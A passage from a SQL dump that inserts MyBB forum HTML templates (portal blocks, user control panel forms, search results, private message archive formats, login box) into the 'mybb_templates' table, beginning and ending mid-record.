<strong>{$messages[\'pms_unread\']}</strong> {$lang->pms_unread}<br /> <strong>&raquo; </strong> <strong>{$messages[\'pms_total\']}</strong> {$lang->pms_total}</span> </td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('284', 'portal_stats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->forum_stats}</strong></td> </tr> <tr> <td class=\"trow1\"> <span class=\"smalltext\"> <strong>&raquo; </strong>{$lang->num_members} {$stats[\'numusers\']}<br /> <strong>&raquo; </strong>{$lang->latest_member} {$newestmember}<br /> <strong>&raquo; </strong>{$lang->num_threads} {$stats[\'numthreads\']}<br /> <strong>&raquo; </strong>{$lang->num_posts} {$stats[\'numposts\']} <br /><br /><a href=\"{$mybb->settings[\'bburl\']}/stats.php\">{$lang->full_stats}</a> </span> </td> </tr> </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('285', 'portal_welcome', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->welcome}</strong></td> </tr> <tr> <td class=\"trow1\"> {$welcometext} </td> </tr> </table><br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('286', 'portal_whosonline', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->online}</strong></td> </tr> <tr> <td class=\"trow1\"> <span class=\"smalltext\"> {$lang->online_users}<br /><strong>&raquo;</strong> {$lang->online_counts}<br />{$onlinemembers} </span> </td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('287', 'portal_announcement_numcomments', '- <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$lang->replies}</a> ({$announcement[\'replies\']})', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('288', 'portal_announcement', '<table cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$icon} <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$announcement[\'subject\']}</a></strong></td> </tr> <tr> <td class=\"trow2\" align=\"right\"> <span class=\"smalltext\">{$lang->posted_by} {$profilelink} - {$anndate} {$anntime} {$numcomments}</span> </td> </tr> <tr> <td class=\"trow1\"> <table border=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> {$avatar} <td class=\"trow1\"> <p> {$message} </p> {$post[\'attachments\']} </td> </tr> <tr> <td align=\"right\" colspan=\"2\" valign=\"bottom\"> <span class=\"smalltext\"> <a href=\"{$mybb->settings[\'bburl\']}/printthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/printable.gif\" alt=\"{$lang->print_this_item}\" title=\"{$lang->print_this_item}\" /></a>&nbsp;<a href=\"{$mybb->settings[\'bburl\']}/sendthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/send.gif\" alt=\"{$lang->send_to_friend}\" title=\"{$lang->send_to_friend}\" /></a> </span> </td> </tr> </table> </td> </tr> </table> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('289', 'portal_announcement_numcomments_no', '- {$lang->no_replies}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('290', 'portal_search', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->search_forums}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"> <form method=\"post\" action=\"{$mybb->settings[\'bburl\']}/search.php\"> <input type=\"hidden\" name=\"action\" value=\"do_search\" /> <input type=\"hidden\" name=\"postthread\" value=\"1\" /> <input type=\"hidden\" name=\"forums\" value=\"all\" /> <input type=\"hidden\" name=\"showresults\" value=\"threads\" /> <input type=\"text\" class=\"textbox\" name=\"keywords\" value=\"\" /> {$gobutton} </form><br /> <span class=\"smalltext\"> (<a href=\"{$mybb->settings[\'bburl\']}/search.php\">{$lang->advanced_search}</a>) </span> </td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('291', 'portal_latestthreads', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->latest_threads}</strong></td> </tr> {$threadlist} </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('292', 'portal_whosonline_memberbit', '{$comma}<a href=\"{$mybb->settings[\'bburl\']}/{$user[\'profilelink\']}\">{$user[\'username\']}</a>{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('293', 'printthread', '<html> <head> <title>{$thread[\'threadprefix\']} {$thread[\'subject\']} - {$lang->printable_version}</title> <meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" /> <style type=\"text/css\"> body { font-family: Verdana, Arial, sans-serif; font-size: 13px; } .largetext { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; } </style> </head> <body> <table width=\"98%\" align=\"center\"> <tr> <td valign=\"top\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></td> </tr> <tr> <td> <span class=\"largetext\">{$thread[\'displaystyle\']} <a href=\"{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a> - {$lang->printable_version}</span><br /> <br /> +- {$mybb->settings[\'bbname\']} (<em>{$mybb->settings[\'bburl\']}</em>)<br /> {$breadcrumb} +{$tdepth} {$lang->thread} {$thread[\'displaystyle\']} {$thread[\'subject\']} (<em>/{$thread[\'threadlink\']}</em>)<br /> <br /> {$multipage}</td> </tr> <tr> <td><br /><hr size=\"1\" />{$postrows}</td> </tr> </table> </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('294', 'forumdisplay_nothreads', '<tr> <td colspan=\"{$colspan}\" class=\"trow1\">{$lang->nothreads}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('295', 'usercp_password', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_password}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_password}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"oldpassword\" size=\"25\" /></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_password}</strong></td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->new_password}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_password}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password2\" size=\"25\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_password\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_password}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('296', 'usercp_email', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_email}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} {$banned_email_error} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_email}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->enter_password}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_email}</strong></td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->new_email}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" size=\"25\" maxlength=\"150\" value=\"{$email}\" /></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_email}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email2\" size=\"25\" maxlength=\"150\" value=\"{$email2}\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_email\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_email}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('297', 'private_archive_txt_folderhead', '####################################################################### {$lang->folder} {$foldername} ####################################################################### ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('298', 'private_archive_txt_message', '{$lang->subject} {$message[\'subject\']} {$tofrom} {$tofromusername} {$lang->sent} {$senddate} ------------------------------------------------------------------------ {$message[\'message\']} ------------------------------------------------------------------------ ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('299', 'private_archive_html_folderhead', '</table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->folder} {$foldername}</strong></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('300', 'private_archive_html_message', '<tr> <td class=\"trow1\"><strong>{$lang->subject} {$message[\'subject\']}</strong><br /><em>{$lang->to} {$message[\'tousername\']}<br />{$lang->from} {$message[\'fromusername\']}<br />{$lang->sent} {$senddate}</em></td> </tr> <tr> <td class=\"trow2\">{$message[\'message\']}</td> </tr> <tr> <td class=\"tcat\" height=\"3\"><img src=\"pixel.gif\" height=\"3\" width=\"1\" alt=\"\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('301', 'private_archive_csv_message', '{$senddate},\"{$foldername}\",\"{$message[\'subject\']}\",\"{$message[\'tousername\']}\",\"{$message[\'fromusername\']}\",\"{$message[\'message\']}\" ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('302', 'search_results_threads_thread', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}\"> {$attachment_count} <div> <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread_link}{$highlight}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span> <div class=\"author smalltext\">{$thread[\'profilelink\']}</div> </div> </td> <td class=\"{$bgcolor}\">{$thread[\'forumlink\']}</td> <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td> <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td> <td class=\"{$bgcolor}\" style=\"white-space: nowrap\"> <span class=\"smalltext\"> {$lastpostdate} {$lastposttime}<br /> <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink} </span> </td> {$inline_mod_checkbox} </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('303', 'search_results_threads', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->search_results}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" align=\"center\" border=\"0\"> <tr> <td align=\"right\" valign=\"top\">{$multipage}</td> </tr> </table> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"8\" class=\"thead\"> <strong>{$lang->search_results}</strong> </td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"3\" width=\"56%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->thread}</a> {$orderarrow[\'subject\']}</strong> / <strong><a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"14%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=forum&amp;order=asc\">{$lang->forum}</a> {$orderarrow[\'forum\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a> {$orderarrow[\'views\']}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=lastpost&amp;order=desc\">{$lang->lastpost}</a> {$orderarrow[\'lastpost\']}</strong></span></td> {$inlinemodcol} </tr> {$selectall} {$results} </table> {$inline_edit_js} <table width=\"100%\" align=\"center\" border=\"0\"> <tr> <td align=\"left\" valign=\"top\">{$multipage}</td> <td align=\"right\" valign=\"top\">{$inlinemod}</td> </tr> </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('304', 'search_results_posts_post', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"\"/></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}\"> <span class=\"smalltext\"> {$lang->post_thread} <a href=\"{$thread_url}{$highlight}\">{$post[\'thread_subject\']}</a><br /> {$lang->post_subject} <a href=\"{$post_url}{$highlight}#pid{$post[\'pid\']}\">{$post[\'subject\']}</a> </span><br /> <table width=\"100%\"><tr><td><span class=\"smalltext\"><em>{$prev}</em></span></td></tr></table> </td> <td align=\"center\" class=\"{$bgcolor}\">{$post[\'profilelink\']}</td> <td class=\"{$bgcolor}\" >{$post[\'forumlink\']}</td> <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$post[\'tid\']});\">{$post[\'thread_replies\']}</a></td> <td align=\"center\" class=\"{$bgcolor}\">{$post[\'thread_views\']}</td> <td class=\"{$bgcolor}\" style=\"white-space: nowrap; text-align: center;\"><span class=\"smalltext\">{$posted}</span></td> {$inline_mod_checkbox} </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('305', 'reputation_add', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$vote_title}</strong><br />{$post_rep_info}<br /> <form action=\"reputation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_add\" /> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <input type=\"hidden\" name=\"pid\" value=\"{$mybb->input[\'pid\']}\" /> <input type=\"hidden\" name=\"rid\" value=\"{$rid}\" /> <select name=\"reputation\" id=\"reputation\"> {$positive_power} {$neutral_power} {$negative_power} </select> <br /><br /> <span class=\"smalltext\">{$lang->user_comments}</span> <br /> <input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"250\" value=\"{$comments}\" style=\"width: 95%\" /> <br /><br /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" value=\"{$vote_button}\" /> {$delete_button} </div> </form> </td> </tr> </table> </body> </html>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('306', 'postbit_reputation', '<br />{$lang->postbit_reputation} {$post[\'userreputation\']}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('307', 'moderation_threadnotes_modaction', '<tr> <td class=\"{$trow}\" align=\"center\">{$modaction[\'profilelink\']}</td> <td class=\"{$trow}\" align=\"center\">{$modaction[\'dateline\']}</td> <td class=\"{$trow}\" align=\"center\">{$modaction[\'action\']}</td> <td class=\"{$trow}\">{$info}</td> </tr> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('308', 'moderation_threadnotes_delayedmodaction', '<tr> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'profilelink\']}</td> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'dateline\']}</td> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'action\']}</td> <td class=\"{$trow}\">{$info}</td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('309', 'misc_smilies', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->smilies_listing}</title> {$headerinclude} </head> <body> {$header} <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->smilies_listing}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->name}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->abbreviation}</strong></span></td> </tr> {$smilies} </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('310', 'search_results_posts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->search_results}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" align=\"center\" border=\"0\"> <tr> <td align=\"right\" valign=\"top\">{$multipage}</td> </tr> </table> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"9\" class=\"thead\"> <strong>{$lang->search_results}</strong> </td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->post}</a> {$orderarrow[\'subject\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=forum&amp;order=asc\">{$lang->forum}</a> {$orderarrow[\'forum\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a></strong> {$orderarrow[\'views\']}</span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=dateline&amp;order=desc\">{$lang->posted}</a> {$orderarrow[\'dateline\']}</strong></span></td> {$inlinemodcol} </tr> {$selectall} {$results} </table> <table width=\"100%\" align=\"center\" border=\"0\"> <tr> <td align=\"left\" valign=\"top\">{$multipage}</td> <td align=\"right\" valign=\"top\">{$inlinemod}</td> </tr> </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('311', 'private_limitwarning', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"><span class=\"smalltext\"><strong><span style=\"color:#FF0000;\">{$lang->reached_warning}</span></strong><br />{$lang->reached_warning2}</span></td> </tr> </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('312', 'misc_smilies_smilie', '<tr> <td class=\"{$class}\" align=\"center\"><img src=\"{$smilie[\'image\']}\" /></td> <td class=\"{$class}\">{$smilie[\'name\']}</td> <td class=\"{$class}\">{$smilie[\'find\']}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('313', 'member_emailuser_guest', '<tr> <td width=\"40%\" class=\"trow2\"><strong>{$lang->your_name}</strong><br /><span class=\"smalltext\">{$lang->name_note}</span></td> <td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"fromname\" /></td> </tr> <tr> <td width=\"40%\" class=\"trow1\"><strong>{$lang->your_email}</strong><br /><span class=\"smalltext\">{$lang->email_note}</span></td> <td width=\"60%\" class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"fromemail\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('314', 'usercp_subscriptions', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->subscriptions}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_subscriptions\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$multipage} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"7\"><strong>{$lang->subscriptions} ({$threadcount})</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"2\">&nbsp;</td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1\"><input name=\"allbox\" title=\"Select All\" type=\"checkbox\" class=\"checkbox checkall\" value=\"1\" /></td> </tr> {$threads} {$remove_options} </table> <br /> <div class=\"float_left\"> <div class=\"float_left\"> <dl class=\"thread_legend smalltext\"> <dd><img src=\"{$theme[\'imgdir\']}/newfolder.gif\" alt=\"{$lang->new_posts_thread}\" title=\"{$lang->new_posts_thread}\" /> {$lang->new_posts_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/newhotfolder.gif\" alt=\"{$lang->new_hot_thread}\" title=\"{$lang->new_hot_thread}\" /> {$lang->new_hot_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/hotfolder.gif\" alt=\"{$lang->hot_thread}\" title=\"{$lang->hot_thread}\" /> {$lang->hot_thread}</dd> </dl> </div> <div class=\"float_left\"> <dl class=\"thread_legend smalltext\"> <dd><img src=\"{$theme[\'imgdir\']}/folder.gif\" alt=\"{$lang->no_new_thread}\" title=\"{$lang->no_new_thread}\" /> {$lang->no_new_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/dot_folder.gif\" alt=\"{$lang->posts_by_you}\" title=\"{$lang->posts_by_you}\" /> {$lang->posts_by_you}</dd> <dd><img src=\"{$theme[\'imgdir\']}/lockfolder.gif\" alt=\"{$lang->locked_thread}\" title=\"{$lang->locked_thread}\" /> {$lang->locked_thread}</dd> </dl> </div> <br style=\"clear: both\" /> </div> {$multipage} </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('315', 'online_today_row', '<tr> <td align=\"center\" class=\"trow1\" width=\"50%\">{$online[\'profilelink\']}{$invisiblemark}</td> <td align=\"center\" class=\"trow2\" width=\"50%\">{$onlinetime}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('316', 'member_profile_email', '<tr> <td class=\"trow2\"><strong>{$lang->email}</strong></td> <td class=\"trow2\"><a href=\"member.php?action=emailuser&amp;uid={$memprofile[\'uid\']}\">{$lang->send_user_email}</a></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('317', 'loginbox', '<tr> <td class=\"trow2\"><strong>{$lang->username}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"30\" value=\"{$username}\" /></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->password}</strong></td> <td class=\"trow1\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"30\" value=\"{$password}\" /></td> </tr> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('318', 'misc_help_section_bit', '<tr> <td width=\"100%\" class=\"{$altbg}\"><strong><a href=\"misc.php?action=help&amp;hid={$helpdoc[\'hid\']}\">{$helpdoc[\'name\']}</a></strong><br /><span class=\"smalltext\">{$helpdoc[\'description\']}</span></td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('319', 'index_birthdays_birthday', '{$comma}{$bdayuser[\'profilelink\']}{$age}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('320', 'private_tracking_readmessage', '<tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/old_pm.gif\" alt=\"\" /></td> <td class=\"trow2\">{$readmessage[\'subject\']}</td> <td class=\"trow1\" align=\"center\">{$readmessage[\'profilelink\']}</td> <td class=\"trow2\" 